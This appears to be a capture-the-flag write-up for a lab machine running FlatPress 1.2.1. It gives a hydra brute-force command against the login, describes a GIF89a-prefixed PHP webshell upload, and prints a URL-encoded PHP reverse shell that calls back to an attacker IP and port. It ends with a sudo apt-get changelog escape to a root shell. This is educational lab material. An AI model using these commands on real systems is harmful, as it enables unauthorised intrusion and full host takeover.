CTF-200-08

Target IP: 192.168.250.29
Challenge Description: N/A.


Reconnaissance

c58e31ceaaa04aef2f1f7def360cf204.png
Performing a port scan shows there are three TCP ports open on the target machine, as shown above.

3126641e2506a4efecc2e30db15bb1f6.png
Performing an aggressive port scan against the three open TCP ports returns the result above. By the looks of it, there are two HTTP applications: one on port 80, and another one on port 8089, as shown above. I will start enumeration with the application on port 8089, as the application name & version FlatPress fp-1.2.1 is provided.


Enumeration

Port 8089: HTTP
afde4380a9732e1dcb4a954bfc6c67e8.png
Browsing to port 8089 displays the webpage above. There is one article created by the FlatPress team; I was hoping for a user of this web application. I scanned the source-code of this application and found out the application version is 1.2.1.

14b03c586d463117d91efbe4d50bea31.png
Browsing to /login displays the login page shown above. I tried different default credentials such as admin:admin and root:root, but I had no luck.

35f092f1f922d516d53c1ab549e4d98f.png
Doing a Google search for flatpress 1.2.1 exploits returns the interesting Github page above. By the looks of it, this application is vulnerable to RCE but I need the credentials of this application first. I performed a directory search against this application and I did not find anything useful either.

a4cb0fabe9fd4ea3489aebecbf34469c.png
I performed another nmap scan with the flag --script=vuln and found .gitignore directory. This contains the entries above.

16bd27e312cd788d7a015d701c3d8b2e.png
Browsing to http://192.168.250.29:8089/fp-content/ contains the contents of this web application. However, I did not find anything important here either.

95a95fd979a38b26e69f0585011c4d1a.png
Using hydra and the command hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.29 http-post-form "/login.php:user=admin&pass=^PASS^:Password incorrect." -s 8089, I managed to bruteforce the password of the user admin. I obtained the credentials admin:password.


Exploitation

8cb27c847aa8f1b9fa6f241563fb148b.png
And bingo! I managed to gain access to the web application on port 8089 as the user admin as shown above. From previous enumeration, I found a PoC for the RCE. I will use this against the target web application.

2f65f5db9f6c79bcc0ae4cfb96bd1f21.png
I created the simple PHP webshell above with the name shell.php. It contains the magic bytes header GIF89a; at start to bypass the upload filters in the place.

79aedf88aabe0796c87acb4caa82bfed.png
Then I pressed the Uploader button and uploaded my shell.php webshell, as shown above.

ecf21dc4285f73ab3ab27ce452ec1c0d.png
I browsed to Media Manager and pressed the shell.php to use it.

806a9037c441e84ba49eba7d9fdefe81.png
And bingo! I can access my webshell at http://192.168.250.29:8089/fp-content/attachs/shell.php. I issued the commands ls;id;whoami and the target machine successfully executed it as shown above. Time to obtain a reverse shell connection now.

feefd0d1a5dd6420b37aa24c02896c3f.png
I started a listener on my machine at port 8443 to catch the reverse shell. Since the target machine is already using PHP, I used the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.237%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. And I obtained a reverse shell connection on my machine at port 8443 with the session as www-data. Now I have a foothold on the target machine.


Privilege Escalation

238ac0292d53412cb461f24b3b2b1525.png
Running sudo -l shows the interesting entry above. The binary apt-get can be executed as the user root without password.

bd2c84cf726de1ce1e912b014ff24a4b.png
Gaining a root shell is simple. I used the command sudo apt-get changelog apt first. This opens the changelog documentation. Then I entered the command !/bin/sh to spawn a root shell. Now I have a root shell on the target machine, as shown above.


Flags

f113cdc827a0333276a18bc654ec6562.png
There is only one flag on the machine: proof.txt flag, as shown above.